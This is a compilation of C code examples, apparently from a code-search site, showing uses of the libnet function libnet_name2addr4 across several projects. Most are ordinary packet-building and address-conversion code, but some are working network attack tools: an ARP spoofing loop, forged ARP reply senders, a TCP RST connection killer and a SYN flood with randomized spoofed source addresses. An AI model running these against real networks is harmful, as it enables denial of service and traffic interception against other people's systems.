Example #1
0
/*
 * Libnet initialize
 */
int libnet_initialize(char *lnet_errbuf, u_int32_t *src_ip, u_int32_t *dst_ip)
{
    // libnet init
    l = libnet_init(LIBNET_RAW4, progopt.device_set() ? progopt.device : NULL, lnet_errbuf);
    if ( l == NULL ) {
        return 0;
    }

    // check destination ip
    *dst_ip = libnet_name2addr4(l, progopt.dstaddr, LIBNET_DONT_RESOLVE);
    if(*dst_ip<1) {
        strncpy(lnet_errbuf, "Destination address error.\n", LIBNET_ERRBUF_SIZE);
        return 0;
    }

    // check source ip
    if(progopt.srcaddr_set()) {
        *src_ip = libnet_name2addr4(l, progopt.srcaddr, LIBNET_DONT_RESOLVE);
        if(*src_ip<1) {
            strncpy(lnet_errbuf, "Source address error.\n", LIBNET_ERRBUF_SIZE);
            return 0;
        }
    }
    else {
        *src_ip = libnet_get_ipaddr4(l);
        if(*src_ip<1) {
            strncpy(lnet_errbuf, libnet_geterror(l), LIBNET_ERRBUF_SIZE);
            return 0;
        }
    }

    return 1;
}
Example #2
0
int
main(int argc, char *argv[])
{
	extern char *optarg;
	extern int optind;
	char pcap_ebuf[PCAP_ERRBUF_SIZE];
	char libnet_ebuf[LIBNET_ERRBUF_SIZE];
	int c;
	
	intf = NULL;
	spoof_ip = target_ip = 0;
	
	while ((c = getopt(argc, argv, "i:t:h?V")) != -1) {
		switch (c) {
		case 'i':
			intf = optarg;
			break;
		case 't':
			if ((target_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
				usage();
			break;
		default:
			usage();
		}
	}
	argc -= optind;
	argv += optind;
	
	if (argc != 1)
		usage();
	
	if ((spoof_ip = libnet_name2addr4(l, argv[0], LIBNET_RESOLVE)) == -1)
		usage();
	
	if (intf == NULL && (intf = pcap_lookupdev(pcap_ebuf)) == NULL)
		errx(1, "%s", pcap_ebuf);
	
	if ((l = libnet_init(LIBNET_LINK, intf, libnet_ebuf)) == NULL)
		errx(1, "%s", libnet_ebuf);
	
	if (target_ip != 0 && !arp_find(target_ip, &target_mac))
		errx(1, "couldn't arp for host %s",
		     libnet_addr2name4(target_ip, LIBNET_DONT_RESOLVE));
	
	signal(SIGHUP, cleanup);
	signal(SIGINT, cleanup);
	signal(SIGTERM, cleanup);
	
	for (;;) {
		arp_send(l, ARPOP_REPLY, NULL, spoof_ip,
			 (target_ip ? (u_int8_t *)&target_mac : NULL),
			 target_ip);
		sleep(2);
	}
	/* NOTREACHED */
	
	exit(0);
}
Example #3
0
void main(int argc,char *argv[])
{
	if(argc!=2)
	{
		printf("用法错误:需要添加目的IP参数\n");
		return;
	}

	char error_buf[LIBNET_ERRBUF_SIZE];
	libnet_t *l;
	l= libnet_init(LIBNET_LINK_ADV,NULL,error_buf);
	if(l==NULL) 
	{
		printf("libnet初始化错误:%s\n",error_buf);
		libnet_destroy(l);
		return;
	}
	
	u_char arp_sha[6]={0x00,0x1e,0x90,0xc7,0xe3,0xbb};
	u_char arp_dha[6]={0x00,0x00,0x00,0x00,0x00,0x00};
	char *arp_src_ip="192.168.1.6";
	u_int arp_spa=libnet_name2addr4(l,arp_src_ip,LIBNET_RESOLVE);
	char *arp_dst_ip=argv[1];
	u_int arp_dpa=libnet_name2addr4(l,arp_dst_ip,LIBNET_RESOLVE);
	if(libnet_build_arp(ARPHRD_ETHER,ETHERTYPE_IP,6,4,ARPOP_REQUEST,arp_sha,(u_int8_t *)&arp_spa,arp_dha,(u_int8_t *)&arp_dpa,NULL,0,l,0)==-1)
	{
		printf("构造ARP错误:%s\n",libnet_geterror(l));
		libnet_destroy(l);
		return;
	}
	
	u_char ether_sha[6]={0x00,0x1e,0x90,0xc7,0xe3,0xbb};
	u_char ether_dha[6]={0xff,0xff,0xff,0xff,0xff,0xff};
	if(libnet_build_ethernet(ether_dha,ether_sha,ETHERTYPE_ARP,NULL,0,l,0)==-1)
	{
		printf("构造以太错误:%s\n",libnet_geterror(l));
		libnet_destroy(l);
		return;
	}
	//libnet_diag_dump_pblock(l);
	//libnet_diag_dump_context(l);
	libnet_write(l);
	libnet_destroy(l);
	return;
}
Example #4
0
//===============================
//I tried to do this same concept using LIBNET_RAW4 instead of LIBNET_LINK so
//I wouldn't have to worry about the ethernet header. But something weird happens when I
//try to do this. If there is already an established connection.. e.g. 70.116.23.2:3779 to
//192.168.0.2:6112, if we send the packet using raw4, in tcpdump we get
//70.116.23.2:1024 --> 192.168.0.2:6112. I am really not sure why it won't send the correct
//source port if that connection is already established, but using LIBNET_LINK seems to not
//have this problem. I believe it is a kernel related issue.
void TcpKill::Execute(const wxString &sIp, u_int nPort)
{
  char szErrBuf[LIBNET_ERRBUF_SIZE];
  libnet_ptag_t ip;
  libnet_ptag_t tcp;

  wxString sSniffDevice = CONFIG(wxString, "Network/SniffDevice");
  wxString sGameHost = CONFIG(wxString, "Network/GameHost");
  int nGamePort = CONFIG(int, "Network/GamePort");

  shared_ptr<NodeInfo> pNodeInfo = Info::Get()->GetNodeInfo(sIp, nPort);
  if (!pNodeInfo) {
    //Interface::Get()->Output(wxString::Format("Can't find %s:%d in net info map.", m_sIp.c_str(), m_nPort), OUTPUT_ERROR);
    return;
  }

  NetInfo &netInfo = Info::Get()->GetNetInfo();

  //This is pretty inefficient since I constantly init libnet and destroy it. It would be better
  //if we could init once and just keep changing the sequence number and destination ip.
  for (u_int x = 0; x < m_nSeverity; x++) {
    u_int32_t seq_out = pNodeInfo->last_sentack;

    libnet_t *pLibnet = libnet_init(LIBNET_LINK, const_cast<char *>(sSniffDevice.c_str()), szErrBuf);
    libnet_seed_prand(pLibnet);

    tcp = libnet_build_tcp(nPort, nGamePort,
                         seq_out, 0, TH_RST, 0, 0, 0, LIBNET_TCP_H, NULL, 0, pLibnet, 0);

    u_long src_ip = libnet_name2addr4(pLibnet, const_cast<char *>(sIp.c_str()), LIBNET_DONT_RESOLVE);
    u_long dst_ip = libnet_name2addr4(pLibnet, const_cast<char *>(sGameHost.c_str()), LIBNET_DONT_RESOLVE);

    ip = libnet_build_ipv4(sizeof(net_ip) + sizeof(net_tcp), 0,
                          libnet_get_prand(LIBNET_PRu16), 0, 64, IPPROTO_TCP, 0,
                          src_ip, dst_ip, NULL, 0, pLibnet, 0);

    libnet_autobuild_ethernet(netInfo.gamehost_ether, ETHERTYPE_IP, pLibnet);

    libnet_write(pLibnet);
    libnet_destroy(pLibnet);
  }
}
Example #5
0
    /* load_ip: load IP data file into memory */
load_ip()
{
    FILE *infile;

    char proto_line[40] = "";
    char id_line[40] = "";
    char frag_line[40] = "";
    char ttl_line[40] = "";
    char saddr_line[40] = "";
    char daddr_line[40] = "";
    char tos_line[90] = "";
    char z_zsaddr[40] = "";
    char z_zdaddr[40] = "";
    char inter_line[15]="";

    infile = fopen(ip_file, "r");

    fgets(id_line, 11, infile);		/* this stuff should be obvious if you read the above subroutine */
    fgets(frag_line, 13, infile);	/* see RFC 791 for details */
    fgets(ttl_line, 10, infile);
    fgets(saddr_line, 24, infile);
    fgets(daddr_line, 24, infile);
    fgets(proto_line, 40, infile);
    fgets(inter_line, 15, infile);
    fgets(tos_line, 78, infile);
    
    sscanf(id_line, "id,%d", &i_id);
    sscanf(frag_line, "frag,%d", &i_frag);
    sscanf(ttl_line, "ttl,%d", &i_ttl);
    sscanf(saddr_line, "saddr,%s", &z_zsaddr);
    sscanf(daddr_line, "daddr,%s", &z_zdaddr);
    sscanf(proto_line, "proto,%s", &ip_proto);
    sscanf(inter_line, "interval,%d", &nap_time);
    sscanf(tos_line, "tos,%[^!]", &i_ttos);

    i_src_addr = libnet_name2addr4(l, z_zsaddr, LIBNET_RESOLVE);
    i_des_addr = libnet_name2addr4(l, z_zdaddr, LIBNET_RESOLVE);
    
    fclose(infile);
}
Example #6
0
    int
check_isn(pkt_t *dp, in_port_t port, u_int32_t *isn)
{
    u_char md5[MD5_DIGEST_LENGTH];
    u_int32_t s = 0;

    struct {
        u_int32_t secret;
        u_int32_t addr;
        in_port_t port;
    } seed;

    (void)memset(&seed, 0, sizeof(seed));

    seed.secret = dp->secret;
    seed.addr = libnet_name2addr4(dp->l, dp->daddr, LIBNET_DONT_RESOLVE);
    seed.port = port;

    (void)MD5((u_char *)&seed, sizeof(seed), md5);
    (void)memcpy(&s, md5, sizeof(s));

    switch (*isn) {
        case 0:
            *isn = htonl(s);
            return (0);
            break;
        default:
            if (*isn == htonl(s+1))
                return (0);
            (void)fprintf(stdout, "\t[ISN RECEIVED = %u, EXPECTING = %u, SECRET = %u, ADDR = %s, PORT = %u]\n",
                          *isn, htonl(s+1), dp->secret, dp->daddr, port);
            /* fall through */
    }

    return (-1);
}
int main(int argc, char** argv){

    libnet_t *l; //libnet context

    char errbuf[LIBNET_ERRBUF_SIZE];
    char ip_addr_str[16], mac_addr_str[18];
    u_int32_t ip_addr;
    u_int8_t *ip_addr_p, *mac_addr;
    int i, length; //for libnet_hex_aton

    if( argc <= 1 ){
        fprintf(stderr, "Usage: %s <iface>\n", argv[0]);
        exit(EXIT_FAILURE);
    }

    l = libnet_init(LIBNET_RAW4 /*inj. type*/, argv[1] /* iface */, errbuf);
    if( l == NULL ){
        fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
        exit(EXIT_FAILURE);
    }

    //IP addr

    printf("IP addr: ");
    scanf("%15s", ip_addr_str);

    ip_addr = libnet_name2addr4(l, ip_addr_str, LIBNET_RESOLVE);

    if( ip_addr != -1 ){ //no error
        //libnet always deals with stuff in network order
       /* Check your system's endianess: */
       ip_addr_p = (u_int8_t*)(&ip_addr);
       printf("ip_addr:   %08X\n", ip_addr);
       printf("ip_addr_p: %02X %02X %02X %02X\n", ip_addr_p[0],\
                     ip_addr_p[1], ip_addr_p[2], ip_addr_p[3]);
        printf("Address as per addr2name4: %s\n", \
                libnet_addr2name4(ip_addr, LIBNET_DONT_RESOLVE));
    }
    else{
        fprintf(stderr, "Error converting IP\n");
    }


    // MAC addr
    printf("MAC address: ");
    scanf("%17s", mac_addr_str);

    mac_addr = libnet_hex_aton((int8_t*)mac_addr_str, &length);

    if( mac_addr != NULL) {

        printf("Address read: ");
        for ( i=0; i < length; i++) {
            printf("%02X", mac_addr[i]);
            if ( i < length-1 )
                printf(":");
        }
        printf("\n");

        // Remember to free the memory allocated by libnet_hex_aton()
        free(mac_addr);
    }
    else{
        fprintf(stderr, "Error converting MAC address.\n");
    }

    libnet_destroy(l);
    return 0;
}
int main(int argc, char *argv[]) {
	libnet_t *libnet_context;
	u_long dest_ip;
	u_short dest_port;
	u_char errbuf[LIBNET_ERRBUF_SIZE];
	int opt, byte_count, packet_size = LIBNET_IPV4_H + LIBNET_TCP_H;

	if(argc < 3)
	{
		printf("Usage:\n%s\t <target host> <target port>\n", argv[0]);
		exit(1);
	}

	libnet_context = libnet_init(LIBNET_RAW4, NULL, errbuf);		// Init libnet context
	if ( libnet_context == NULL )
	{
		fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
		exit(EXIT_FAILURE);
	}

	dest_ip = libnet_name2addr4(libnet_context, argv[1], LIBNET_RESOLVE); // the host 
	dest_port = (u_short) atoi(argv[2]); // the port 

	libnet_seed_prand(libnet_context); // seed the random number generator 

	printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip));
	while(1) // loop forever (until break by CTRL-C) 
	{
		
		libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // source TCP port (random) 
		 dest_port,                      // destination TCP port 
		 libnet_get_prand(LIBNET_PRu32), // sequence number (randomized) 
		 libnet_get_prand(LIBNET_PRu32), // acknowledgement number (randomized) 
		 TH_SYN,                         // control flags (SYN flag set only) 
		 libnet_get_prand(LIBNET_PRu16), // window size (randomized) 
		 0,				 // checksum (0 autofill)
		 0,                              // urgent pointer 
		 LIBNET_TCP_H,	 // tcp packet length
		 NULL,                           // payload (none) 
		 0,                              // payload length
		 libnet_context,		 // context 
		 0);          			 // ptag 

		libnet_build_ipv4(LIBNET_IPV4_H + LIBNET_TCP_H,  // size of the packet sans IP header 
		 IPTOS_LOWDELAY,                 // IP tos 
		 libnet_get_prand(LIBNET_PRu16), // IP ID (randomized) 
		 0,                              // frag stuff 
		 libnet_get_prand(LIBNET_PR8),   // TTL (randomized) 
		 IPPROTO_TCP,                    // transport protocol
		 0,				 // checksum 
		 libnet_get_prand(LIBNET_PRu32), // source IP (randomized) 
		 dest_ip,                        // destination IP 
		 NULL,                           // payload (none) 
		 0,                              // payload length
		 libnet_context,		 // libnet context 
		 0);                       	 // ptag 


		byte_count = libnet_write(libnet_context); // inject packet
		if ( byte_count != -1 )
			printf("%d bytes written.\n", byte_count);
		else
			fprintf(stderr, "Error writing packet: %s\n",\
			libnet_geterror(libnet_context)); 
			
		libnet_clear_packet(libnet_context);	// clear packet
		usleep(FLOOD_DELAY); 			// wait for FLOOD_DELAY milliseconds  
	}

	libnet_destroy(libnet_context); // free packet memory 

	return 0;
}
Example #9
0
/*
=======================================================================================================================
在windows平台下必须包含此文件,文件libnet.h是libnet开发包的头文件
=======================================================================================================================
 */
void main()
{
    int packet_size;
    /* 存放数据包长度的变量 */
    libnet_t *l;
    /* libnet句柄 */
    libnet_ptag_t protocol_tag;
    /* 协议块标记 */
	int num;
    char *device = NULL;
    /* 设备名字,此时为NULL */
    char error_information[LIBNET_ERRBUF_SIZE];
    /* 用来存放错误信息 */
    char *destination_ip_str = "192.168.1.1";
    /* 目的IP地址字符串变量,可以指定任意一个合法的IP地址 */
    char *source_ip_str = "192.168.1.102";
    /* 源IP地址字符串变量,可以指定任意一个合法的IP地址 */
    u_char hardware_source[6] =
    {
        0x01, 0x02, 0x03, 0x04, 0x05, 0x06
    };
    /* 源MAC地址,可以是任意指定 */
    u_char hardware_destination[6] =
    {
        0x00, 0x14, 0x78, 0xA7, 0xC8, 0x44
    };
    /* 目的MAC地址,可以是任意指定 */
    u_long destination_ip;
    /* 目的IP地址 */
    u_long source_ip;
    /* 源IP地址 */
    destination_ip = libnet_name2addr4(l, destination_ip_str, LIBNET_RESOLVE);
    /* 把目的IP地址字符串形式转化成网络顺序字节形式的数据 */
    source_ip = libnet_name2addr4(l, source_ip_str, LIBNET_RESOLVE);
    /* 把源IP地址字符串形式转化成网络顺序字节形式的数据 */
    l = libnet_init(
    /* 初始化libnet */
    LIBNET_LINK_ADV,
    /* libnet类型 */
    device,
    /* 网络设备 */
    error_information); /* 错误信息
     * */
    protocol_tag = libnet_build_arp(
    /* 构造ARP协议块,函数的返回值是代表新生成的ARP协议块的一个协议块标记, */
    ARPHRD_ETHER,
    /* 硬件地址类型,在这里是以太网 */
    ETHERTYPE_IP,
    /* 协议地址类型,在这里是IP协议 */
    6,
    /* 硬件地址长度,MAC地址的长度为6 */
    4,
    /* 协议地址长度,IP地址的长度为4 */
    ARPOP_REPLY,
    /* 操作类型,在这里是ARP应答类型 */
    hardware_source,
    /* 源硬件地址 */
    (u_int8_t*) &source_ip,
    /* 源IP地址 */
    hardware_destination,
    /* 目标硬件地址 */
    (u_int8_t*) &destination_ip,
    /* 目标协议地址 */
    NULL,
    /* 负载,此时为NULL */
    0,
    /* 负载的长度,此时为0 */
    l,
    /* libnet句柄,此句柄由libnet_init()函数生成 */
    0
    /* 协议块标记,此时为0,表示构造一个新的ARP协议块,而不是修改已经存在的协议块
     * */
    );
    protocol_tag = libnet_autobuild_ethernet(
    /* 构造一个以太网协议块,返回一个指向此协议块的标记 */
    hardware_destination,
    /* 目的硬件地址 */
    ETHERTYPE_ARP,
    /* 以太网上层协议类型,此时为ARP类型 */
    l /* libnet句柄 */
    );
	
 	while(1)
	{
	Sleep(100);
    packet_size = libnet_write(l);
    /*
     * 发送已经构造的ARP数据包,注意此数据包应该包括两部分,一部分是ARP协议块,另外一部分是以太网协议块
     */
    printf("发送一个%d字节长度的ARP应答数据包\n", packet_size);
    /* 输出发送的ARP数据包的字节数 */
    }
	libnet_destroy(l);
    /* 销毁libnet */
}
Example #10
0
int
main(int argc, char *argv[])
{
    int c;
    char *cp;
    libnet_t *l;
    libnet_ptag_t t;
    char *payload;
    u_short payload_s;
    u_long src_ip, dst_ip;
    u_short src_prt, dst_prt;
    char errbuf[LIBNET_ERRBUF_SIZE];

    printf("libnet 1.1 packet shaping: TCP (over Token Ring) [link]\n");

    /*
     *  Initialize the library.  Root priviledges are required.
     *
     *  Currently hard-coded for tr0.
     */
    l = libnet_init(
            LIBNET_LINK,                            /* injection type */
            "tr0",                                  /* network interface */
            errbuf);                                /* error buffer */

    if (l == NULL)
    {
        fprintf(stderr, "libnet_init() failed: %s", errbuf);
        exit(EXIT_FAILURE); 
    }

    src_ip  = 0;
    dst_ip  = 0;
    src_prt = 0;
    dst_prt = 0;
    payload = NULL;
    payload_s = 0;
    while ((c = getopt(argc, argv, "d:s:p:")) != EOF)
    {
        switch (c)
        {
            /*
             *  We expect the input to be of the form `ip.ip.ip.ip.port`.  We
             *  point cp to the last dot of the IP address/port string and
             *  then seperate them with a NULL byte.  The optarg now points to
             *  just the IP address, and cp points to the port.
             */
            case 'd':
                if (!(cp = strrchr(optarg, '.')))
                {
                    usage(argv[0]);
                }
                *cp++ = 0;
                dst_prt = (u_short)atoi(cp);
                if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
                {
                    fprintf(stderr, "Bad destination IP address: %s\n", optarg);
                    exit(EXIT_FAILURE);
                }
                break;
            case 's':
                if (!(cp = strrchr(optarg, '.')))
                {
                    usage(argv[0]);
                }
                *cp++ = 0;
                src_prt = (u_short)atoi(cp);
                if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
                {
                    fprintf(stderr, "Bad source IP address: %s\n", optarg);
                    exit(EXIT_FAILURE);
                }
                break;
            case 'p':
                payload = optarg;
                payload_s = strlen(payload);
                break;
            default:
                exit(EXIT_FAILURE);
        }
    }

    if (!src_ip || !src_prt || !dst_ip || !dst_prt)
    {
        usage(argv[0]);
        exit(EXIT_FAILURE);
    }


    t = libnet_build_tcp(
        src_prt,                                    /* source port */
        dst_prt,                                    /* destination port */
        0x01010101,                                 /* sequence number */
        0x02020202,                                 /* acknowledgement num */
        TH_SYN,                                     /* control flags */
        32767,                                      /* window size */
        0,                                          /* checksum */
        0,                                          /* urgent pointer */
        LIBNET_TCP_H + payload_s,                   /* TCP packet size */
        payload,                                    /* payload */
        payload_s,                                  /* payload size */
        l,                                          /* libnet handle */
        0);                                         /* libnet id */
    if (t == -1)
    {
        fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));
        goto bad;
    }

    t = libnet_build_ipv4(
        LIBNET_IPV4_H + LIBNET_TCP_H + payload_s,   /* length */
        0,                                          /* TOS */
        242,                                        /* IP ID */
        0,                                          /* IP Frag */
        64,                                         /* TTL */
        IPPROTO_TCP,                                /* protocol */
        0,                                          /* checksum */
        src_ip,                                     /* source IP */
        dst_ip,                                     /* destination IP */
        NULL,                                       /* payload */
        0,                                          /* payload size */
        l,                                          /* libnet handle */
        0);                                         /* libnet id */
    if (t == -1)
    {
        fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
        goto bad;
    }

    t = libnet_build_token_ring(
        LIBNET_TOKEN_RING_FRAME,
        LIBNET_TOKEN_RING_LLC_FRAME,                /* LLC - Normal buffer */
        tr_dst,                                     /* token ring destination */
        tr_src,                                     /* token ring source */
        LIBNET_SAP_SNAP,                            /* DSAP -> SNAP encap */
        LIBNET_SAP_SNAP,                            /* SSAP -> SNAP encap */
        0x03,                                       /* Unnumbered info/frame */
        org_code,                                   /* Organization Code */
        TOKEN_RING_TYPE_IP,                         /* protocol type */
        NULL,                                       /* payload */
        0,                                          /* payload size */
        l,                                          /* libnet handle */
        0);                                         /* libnet id */
    if (t == -1)
    {
        fprintf(stderr, "Can't build token ring header: %s\n", libnet_geterror(l));
        goto bad;
    }

    /*
     *  Write it to the wire.
     */
    c = libnet_write(l);
    if (c == -1)
    {
        fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
        goto bad;
    }
    else
    {
        fprintf(stderr, "Wrote %d byte TCP packet; check the wire.\n", c);
    }
    libnet_destroy(l);
    return (EXIT_SUCCESS);
bad:
    libnet_destroy(l);
    return (EXIT_FAILURE);
}
Example #11
0
File: udp2.c Project: big3k/oneway
int
main(int argc, char **argv)
{
    int c, build_ip;
    struct timeval r;
    struct timeval s;
    struct timeval e;
    libnet_t *l;
    libnet_ptag_t udp;
    char *payload;
    libnet_ptag_t t;
    struct libnet_stats ls;
    u_short payload_s;
    u_long src_ip, dst_ip;
    u_short bport, eport, cport;
    libnet_plist_t plist, *plist_p;
    char errbuf[LIBNET_ERRBUF_SIZE];
    printf("libnet 1.1.0 packet shaping: UDP2[link]\n");

    l = libnet_init(
            LIBNET_LINK,                            /* injection type */
            NULL,                                   /* network interface */
            errbuf);                                /* errbuf */
 
    if (l == NULL)
    {
        fprintf(stderr, "libnet_init() failed: %s", errbuf);
        exit(EXIT_FAILURE);
    }

    src_ip = 0;
    dst_ip = 0;
    payload = NULL;
    payload_s = 0;
    plist_p = NULL;
    while ((c = getopt(argc, argv, "d:s:p:P:")) != EOF)
    {
        switch (c)
        {
            case 'd':
                if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
                {
                    fprintf(stderr, "Bad destination IP address: %s\n", optarg);                    
                    exit(1);
                }
                break;
            case 's':
                if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
                {
                    fprintf(stderr, "Bad source IP address: %s\n", optarg);
                    exit(1);
                }
                break;
            case 'P':
                plist_p = &plist;
                if (libnet_plist_chain_new(l, &plist_p, optarg) == -1)
                {
                    fprintf(stderr, "Bad token in port list: %s\n",
                        libnet_geterror(l));
                    exit(1);
                }
                break;
            case 'p':
                payload = optarg;
                payload_s = strlen(payload);
                break;
            default:
                usage(argv[0]);
                exit(EXIT_FAILURE);
        }
    }

    if (!src_ip || !dst_ip || !plist_p)
    {
        usage(argv[0]);
        exit(EXIT_FAILURE);
    }

    udp = 0;
#if !(__WIN32__)
    gettimeofday(&s, NULL);
#else
    /* This obviously is not as good - but it compiles now. */
    s.tv_sec = time(NULL);
    s.tv_usec = 0;
#endif

    build_ip = 1;
    while (libnet_plist_chain_next_pair(plist_p, &bport, &eport))
    {
        while (!(bport > eport) && bport != 0)
        {
            cport = bport++;
            udp = libnet_build_udp(
                1025,                               /* source port */
                cport,                              /* destination port */
                LIBNET_UDP_H + payload_s,           /* packet size */
                0,                                  /* checksum */
                payload,                            /* payload */
                payload_s,                          /* payload size */
                l,                                  /* libnet handle */
                udp);                               /* libnet id */
            if (udp == -1)
            {
                fprintf(stderr, "Can't build UDP header (at port %d): %s\n", 
                        cport, libnet_geterror(l));
                goto bad;
            }
    if (build_ip)
    {
        build_ip = 0;
        t = libnet_build_ipv4(
            LIBNET_IPV4_H + LIBNET_UDP_H + payload_s,   /* length */
            0,                                          /* TOS */
            242,                                        /* IP ID */
            0,                                          /* IP Frag */
            64,                                         /* TTL */
            IPPROTO_UDP,                                /* protocol */
            0,                                          /* checksum */
            src_ip,                                     /* source IP */
            dst_ip,                                     /* destination IP */
            NULL,                                       /* payload */
            0,                                          /* payload size */
            l,                                          /* libnet handle */
            0);
        if (t == -1)
        {
            fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
            goto bad;
        }

        t = libnet_build_ethernet(
            enet_dst,                                   /* ethernet destination */
            enet_src,                                   /* ethernet source */
            ETHERTYPE_IP,                               /* protocol type */
            NULL,                                       /* payload */
            0,                                          /* payload size */
            l,                                          /* libnet handle */
            0);
        if (t == -1)
        {
            fprintf(stderr, "Can't build ethernet header: %s\n", libnet_geterror(l));
            goto bad;
        }
    }
            //usleep(100);
            c = libnet_write(l); 
            if (c == -1)
            {
                fprintf(stderr, "write error: %s\n", libnet_geterror(l));
            }
            else
            {
               fprintf(stderr, "wrote %d UDP packet to port %d\n", c, cport);
//                fprintf(stderr, ".");
            }
        }
    }

#if !(__WIN32__)
    gettimeofday(&s, NULL);
#else
    /* This obviously is not as good - but it compiles now. */
    s.tv_sec = time(NULL);
    s.tv_usec = 0;
#endif

    libnet_timersub(&e, &s, &r);
    fprintf(stderr, "Total time spent in loop: %ld.%ld\n", r.tv_sec, r.tv_usec);

    libnet_stats(l, &ls);
    fprintf(stderr, "Packets sent:  %ld\n"
                    "Packet errors: %ld\n"
                    "Bytes written: %ld\n",
                    ls.packets_sent, ls.packet_errors, ls.bytes_written);
    libnet_destroy(l);
    return (EXIT_SUCCESS);
bad:
    libnet_destroy(l);
    return (EXIT_FAILURE);
}
Example #12
0
    void
drench_send_tcp(pkt_t *dp, u_int8_t offset, u_char *pkt)
{
    struct ether_header *eh = NULL;
    struct ip *ih = NULL;
    struct tcphdr *th = NULL;

    char *state = NULL;

    in_port_t sport = 0;
    size_t paylen = 0;

    u_int32_t isn = 0;

    if (dp->payload != NULL)
        paylen = strlen(dp->payload);

    state = TCP_PHASE(dp->flags, "S",  "A");

    if (pkt != NULL) {
        eh = (struct ether_header *)pkt;
        ih = (struct ip *)(pkt + sizeof(struct ether_header));
        th = (struct tcphdr *)(pkt + sizeof(struct ether_header) + sizeof(struct ip));

        isn = th->th_ack;
        sport = th->th_dport;

    }
    else {
        sport = libnet_get_prand(LIBNET_PRu16);
    }

    /* Sanity check: check the ack number of the packet to 
     * make sure we sent it. We can do this by performing
     * a calculation on the sequence number we
     * send, based on a "secret" random number */
    if (check_isn(dp, sport, &isn) < 0) {
        (void)fprintf(stdout,
                      "(C->S)[%s] SRC = %15s:%-6u DST = %15s:%-6u INVALID ISN in ACK%s [isn = %u]\n",
                      state,
                      TCP_PHASE(
                          dp->flags,
                          dp->saddr,
                          libnet_addr2name4(ih->ip_dst.s_addr, LIBNET_DONT_RESOLVE)
                          ),
                      sport,
                      TCP_PHASE(
                          dp->flags,
                          dp->daddr,
                          libnet_addr2name4(ih->ip_src.s_addr, LIBNET_DONT_RESOLVE)
                          ),
                      dp->dport,
                      (dp->opts & O_CHKISN ? ", DROPPING PACKET" : ""),
                      isn);

        if (dp->opts & O_CHKISN)
            return;
    }

    LIBNET_ERR(dp->p_tcp = libnet_build_tcp(
                TCP_PHASE(dp->flags, sport, th->th_dport),                                          /* Source port */
                dp->dport,                                                                      /* Destination port */
                TCP_PHASE(dp->flags, isn, (th->th_ack + paylen)),                                   /* ISN */
                /* Sniffed packet's seq num */
                TCP_PHASE(dp->flags, 0, (th->th_seq + 1)),                                          /* ACK */
                TCP_PHASE(dp->flags, dp->flags,  dp->flags /*| TH_PUSH*/),                          /* Control flags */
                dp->winsize,                                                                    /* window size */
                0,                                                                              /* auto checksum */
                0,                                                                              /* Urgent data pointer */
                TCP_PHASE(dp->flags, LIBNET_TCP_H,  LIBNET_TCP_H + paylen),                         /* total packet length */
                TCP_PHASE(dp->flags, NULL, (u_char *)dp->payload),                                  /* payload */
                TCP_PHASE(dp->flags, 0, paylen),                                                    /* payload size */
                dp->l,                                                                          /* libnet context */
                dp->p_tcp                                                                       /* ptag */
                ));

    LIBNET_ERR(dp->p_ip = libnet_build_ipv4(
                TCP_PHASE(dp->flags, LIBNET_IPV4_H + LIBNET_TCP_H, LIBNET_IPV4_H + LIBNET_TCP_H + paylen),
                TCP_PHASE(dp->flags, 0, IPTOS_LOWDELAY),                                            /* TOS */
                libnet_get_prand(LIBNET_PRu16),
                0,                                                                              /* Frag */
                MAX_TTL,                                                                        /* TTL */
                IPPROTO_TCP,                                                                    /* Protocol */
                0,                                                                              /* auto checksum */
                TCP_PHASE(dp->flags, htonl(ntohl(libnet_name2addr4(dp->l, dp->saddr, LIBNET_DONT_RESOLVE)) + offset),
                    ih->ip_dst.s_addr),                                                         /* XXX error check, source */
                TCP_PHASE(dp->flags, libnet_name2addr4(dp->l, dp->daddr, LIBNET_DONT_RESOLVE),
                    ih->ip_src.s_addr),                                                         /* XXX error check, destination */
                NULL,                                                                           /* payload */
                0,                                                                              /* payload size */
                dp->l,                                                                          /* libnet context */
                dp->p_ip                                                                        /* libnet ptag */
                ));

    if (libnet_write(dp->l) == -1)
        state = "x";

    (void)fprintf(stdout, "(C->S)[%s] SRC = %15s:%-6u DST = %15s:%-6u\n", state,
                  TCP_PHASE(
                      dp->flags,
                      libnet_addr2name4(
                          htonl(ntohl(libnet_name2addr4(dp->l, dp->saddr, LIBNET_DONT_RESOLVE)) + offset),
                          LIBNET_DONT_RESOLVE
                          ),
                      libnet_addr2name4(ih->ip_dst.s_addr, LIBNET_DONT_RESOLVE)
                      ),
                  sport,
                  TCP_PHASE(
                      dp->flags,
                      dp->daddr,
                      libnet_addr2name4(ih->ip_src.s_addr, LIBNET_DONT_RESOLVE)
                      ),
                  dp->dport);

    (void)fflush(stdout);
}
int
libnet_select_device(libnet_t *l)
{
    int c, i;
    int8_t err_buf[LIBNET_ERRBUF_SIZE];
    struct libnet_ifaddr_list *address_list, *al;
    u_int32_t addr;


    if (l == NULL)
    { 
        return (-1);
    }

    if (l->device && !isdigit(l->device[0]))
    {
#if !(__WIN32__)
	if (libnet_check_iface(l) < 0)
	{
            /* err msg set in libnet_check_iface() */
	    return (-1);
	}
#endif
	return (1);
    }

    /*
     *  Number of interfaces.
     */
    c = libnet_ifaddrlist(&address_list, l->device, err_buf);
    if (c < 0)
    {
        /* err msg set in libnet_ifaddrlist() */
        return (-1);
    }
    else if (c == 0)
    {
        snprintf(l->err_buf, LIBNET_ERRBUF_SIZE,
                "%s(): no network interface found\n", __func__);
        return (-1);
    }
	
    al = address_list;
    if (l->device)
    {
        /*
         *  Then we have an IP address in l->device => do lookup
         */
	addr = libnet_name2addr4(l, l->device, 0);

        for (i = c; i; --i, ++address_list)
        {
            if (((addr == -1) && !(strncmp(l->device, address_list->device,
